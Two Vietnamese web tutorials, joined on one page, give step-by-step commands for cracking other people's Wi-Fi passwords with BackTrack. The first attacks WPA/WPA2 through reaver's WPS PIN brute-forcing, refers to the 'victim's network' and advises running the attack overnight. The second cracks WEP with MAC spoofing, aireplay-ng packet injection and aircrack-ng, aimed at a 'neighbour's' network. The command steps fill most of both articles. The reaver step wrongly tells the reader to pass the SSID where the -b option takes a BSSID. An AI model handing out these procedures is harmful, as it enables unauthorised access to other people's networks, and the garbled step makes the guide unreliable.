Hack pass WiFi WPA/WPA2 với BackTrack 5 R3 Hack wifi không phải là vấn đề mới mẻ bởi nhu cầu người dùng tìm kiếm khá nhiều. Tuy nhiên các phần mềm, công cụ chạy trên hệ điều hành Windows thì khả năng dò chính xác pass wifi lại khá hiếm nếu như không nói là không thể. Nó chỉ hên xui hack mật khẩu mã hóa theo cơ chế cũ. Việc hack pass WiFi WPA/WPA2 không phải là vấn đề đơn giản hay chỉ vài nhấp chuột là xong. Bởi vậy mà cụm từ hack wifi với backtrack được người dùng lựa chọn và hiệu quả cao hơn hẳn. Phiên bản mới nhất là BackTrack 5 R3. Vậy cách bước thực hiện như thế nào để dò được mật khẩu mạng không dây wifi ?. Nội dung bài viết tối ngày hôm nay mình sẽ đề cập tới cho các bạn tham khảo, áp dụng vào trường hợp cụ thể. Đề xuất phần mềm hack wifi mới hơn: Reaver Pro Full Mình sẽ đi thẳng vào vấn đề, không dài dòng cũng như giới thiệu không đâu, bởi bạn có lẽ đang hồi hộp để làm theo các bước hướng dẫn đúng không nào ?. Hack pass WiFi WPA/WPA2 bằng hệ điều hành BackTrack 5 R3 1. Chuẩn bị đồ nghề Download phiên bản BackTrack 5 R3: Link Torrent – Link ISO – Bạn xem tải kiểu nào tốc độ nhanh thì dùng.  USB có dung lượng trống >= 4GB.  Sử dụng Rufus để tạo usb boot – Tải về Tại đây 2. Tiến hành hack wifi WPA/WPA2 với Backtrack 5 R3  Sau khi tạo Boot USB, bạn khởi động lại máy tính và boot vào USB chạy chế độ Live chứ không cần phải cài đặt nhé. Để vào giao diện đồ họa thì tại màn hình root ban đầu, bạn nhập: startx rồi nhấn Enter. Tiếp theo, bạn nhấn Ctrl+Alt+T để mở cửa sổ dòng lệnh Terminal. Để kích hoạt card mạng WiFi, bạn nhập lệnh: airmon-ng start wlan0 rồi nhấn Enter Bước kế tiếp, bạn nhập lệnh: airodump-ng mon0 và nhấn Enter để tìm SSID hay tên mạng wifi. Ngay lập tức nó sẽ dò toàn bộ các mạng WiFi xung quanh bạn trong phạm vi nó hỗ trợ. Cho dù là hộ gia đình, nhà hàng, quán cà phê… Miễn có mạng wifi là nó đều quét ra. bạn copy SSID mà bạn muốn hack pass wifi wpa, wpa2 như hình: Việc cần làm tiếp theo, bạn nhập lệnh: reaver -i mon0 -b SSID -vv. Trong đó: SSID: Thông số bạn Copy ở bước trên  vv: 2 chữ v nhé Ngay sau đó nó tự dò tìm mã pin, mã psk  Thời gian dò tìm pass wifi wpa, wpa2 có thể lên tới 9h hoặc ít hơn tùy thuộc vào cấu hình máy tính của bạn, độ khó mà mạng wifi họ đặt. Khi xuất hiện nội dung như hình trên là OK nhé, bạn đã có đủ thông tin để kết nối tới mạng wifi nạn nhân. Vậy là xong, chỉ với vài câu lệnh là bạn đã hoàn thành việc hack wifi với backtrack rồi đó. Áp dụng ngay từ bây giờ, nếu thành công hãy chia sẻ cho bạn bè nhé. Mẹo: Nên hack pass wifi wpa/wpa2 với backtrack 5 r3 vào lúc đêm tối (tầm 12h) nhé. Tỉ lệ thành công sẽ cao hơn, treo máy trong khi ngủ, sáng dậy ok không phải chờ như chạy ban ngày. Chúc bạn thành công. Nguồn : http://phanmemaz.com/thu-thuat/hack-pass-wifi-wpa-wpa2.html

Mật khẩu wifi mã hóa dạng WEP hiện tại đã không còn được sử dụng do các vấn đề về an ninh và bảo mật. Tuy nhiên, đối với một số thiết bị cũ vẫn sử dụng chuẩn WEP, việc dò mật khẩu wifi “nhà hàng xóm” đã không còn quá phức tạp. Taimienphi sẽ hướng dẫn các bạn chi tiết cách dò mật khẩu wifi dạng WEP với Backtrack

Bài viết liên quan

• Cách sử dụng WiFi Chùa lấy mật khẩu WIFI hàng xóm vào mạng
• Kiểm tra điện thoại, laptop dùng wifi chùa với Fing Tools
• Cách cài đặt Dumpper
• Ẩn Wifi, ẩn SSID Viettel, FPT, GPON, HUAWEI trên Laptop
• Cách bẻ khóa wifi trên laptop

WEP - Wired Equivalent Privacy - thuật toán bảo vệ wifi của các bộ định tuyến không dây đã được giới thiệu và sử dụng rất rộng rãi trong thời điểm trước đây. Tuy nhiên trong quá trình sử dụng, thuật toán WEP lộ ra nhiều lỗ hổng bảo mật và bị khai thác làm ảnh hưởng đến an ninh thông tin cho người dùng cũng như doanh nghiệp. Về sau này, các chuẩn mã hóa tiên tiến hơn đã được giới thiệu như WPA hay WPA2 thay thế WEP đã lỗi thời, tuy nhiên trên các thiết bị cũ hay những mạng máy tính đã lỗi thời, WEP vẫn còn tiếp tục được sử dụng.

Taimienphi sẽ hướng dẫn các bạn chi tiết các bước thao tác dò mật khẩu mạng wifi sử dụng chuẩn mã hóa WEP bằng Backtrack. Các bạn lưu ý, không sử dụng cách làm này vào mục đích phá hoại hay ý đồ xấu.

Yêu cầu hệ thống hạ tầng :

Bộ chuyển đổi không dây tương thích : Đây là yêu cầu lớn nhất cho hạ tầng, bạn cần chuẩn bị 1 bộ chuyển đổi không dây (wireless adapter) có khả năng truyền gói tin mà máy tính của bạn không làm được. Các bạn có thể tham khảo một số model như Alfa AWUS050NH…

Đĩa Backtrack LiveCD : Cho phép thực hiện các thao tác kiểm tra bảo mật. Bạn có thể tải các bản ISO và burn lại trên CD của mình.

Mạng wifi chuẩn WEP : Lưu ý, tin hiệu cần ổn định và có nhiều người dùng, càng nhiều người sử dụng cơ hội dò mật khẩu thành công càng cao

Thao tác dò mật khẩu wifi với Backtrack

Bước 1: Kích hoạt giao diện dòng lệnh Konsole trong Backtrack

Bước 2: Gõ vào dòng lệnh

airmon-ng

để lấy danh sách mạng

Các bạn ghi lại thông tin trong cột Interface , ở đây là ra0

Gõ lần lượt các dòng lệnh

airmon-ng stop (interface)

ifconfig (interface) down

macchanger --mac 00:11:22:33:44:55 (interface)

airmon-ng start (interface)

(interface) là tên mạng interface bên trên các bạn đã lưu lại, của mình là ra0

Bên trên là các bước giả mạo địa chỉ MAC mới cho Interface mạng. Trong quá trình các bạn thao tác nếu kết quả không giống như bên trên, có thể wireless adapter của bạn không phù hợp nữa.

Bước 3 : Gõ tiếp dòng lệnh

airodump-ng (interface)

(interface) là tên mạng interface bên trên các bạn đã lưu lại, của mình là ra0

Câu lệnh này sẽ cho hiển thị các mạng wifi xung quanh bạn. Khi tìm thấy wifi bạn muốn dò mật khẩu, bấm tổ hợp phím Ctrl + C để dừng danh sách.

Các bạn lưu lại các thông số BSSID và CH . Lưu ý trong cột ENC hay CCMP phải là WEP bạn mới có thể dò mật khẩu được

Bước 4: Gõ vào dòng lệnh

airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

(channel) là thông số CH bạn lưu ở bước 3

(bssid) là thông số BSSID bạn đã lưu ở bước 3

(interface) là tên mạng interface bên trên các bạn đã lưu lại, của mình là ra0

(filename) là tên file mô tả, các bạn có thể đặt tùy ý. Ở đây mình đặt là yoyo

Bước 5: Bạn sẽ nhận được đầu ra của câu lệnh như hình trên, để nguyên cửa sổ ở đó, mở cửa sổ câu lệnh Konsole mới, nhập lệnh

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

(bssid) là thông số BSSID bạn đã lưu ở bước 3

(essid) là tên file mô tả (filename) các bạn đặt ở bước 4

(interface) là tên mạng interface bên trên các bạn đã lưu lại, của mình là ra0

Bạn sẽ nhận được tin nhắn báo thành công Association successful J

Bước 6 : Gõ tiếp vào câu lệnh

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

(bssid) là thông số BSSID bạn đã lưu ở bước 3

(interface) là tên mạng interface bên trên các bạn đã lưu lại, của mình là ra0

00:11:22:33:44:55 là địa chỉ MAC giả mạo bên trên

Backtrack sẽ tiến hành bắt các gói tin từ dữ liệu ra vào trên mạng Wifi đó. Dữ liệu sẽ được thu thập đầy đủ để tiến hành dò mật khẩu.

Lưu ý: Theo dõi số liệu cột Data ở cửa sổ Konsole đầu tiên. Bạn cần phải để số liệu trong cột

Data vượt qua con số 10.000 , Backtrack mới có thể có đủ dữ liệu để dò mật khẩu

Bước 7: Mở cửa sổ Konsole mới và nhập câu lệnh

aircrack-ng -b (bssid) (file name-01.cap)

(bssid) là thông số BSSID bạn đã lưu ở bước 3

File name các bạn có thể đặt tùy ý với phần mở rộng là .cap

Sau bước này, nếu như mật khẩu được dò ra sẽ hiển thị ngay trên giao diện câu lệnh sau từ khóa KEY FOUND . Trường hợp không đủ dữ liệu để dò được mật khẩu, bạn nên thử lại vào thời điểm khác.

Lưu ý: Các bước làm trên đây được thực hiện trong điều kiện lý tưởng với tỉ lệ thành công cao. Trong quá trình các bạn thao tác, rất có thể các bước sẽ không giống như trên hoặc có thông báo lỗi, các bạn cần kiểm tra lại hạ tầng mạng cũng như thực hiện lại vào thời điểm khác. Điều cần thiết trong việc này luôn là sự kiên nhẫn chờ đợi do việc dò mật khẩu từ các gói tin ra vào là không hề đơn giản.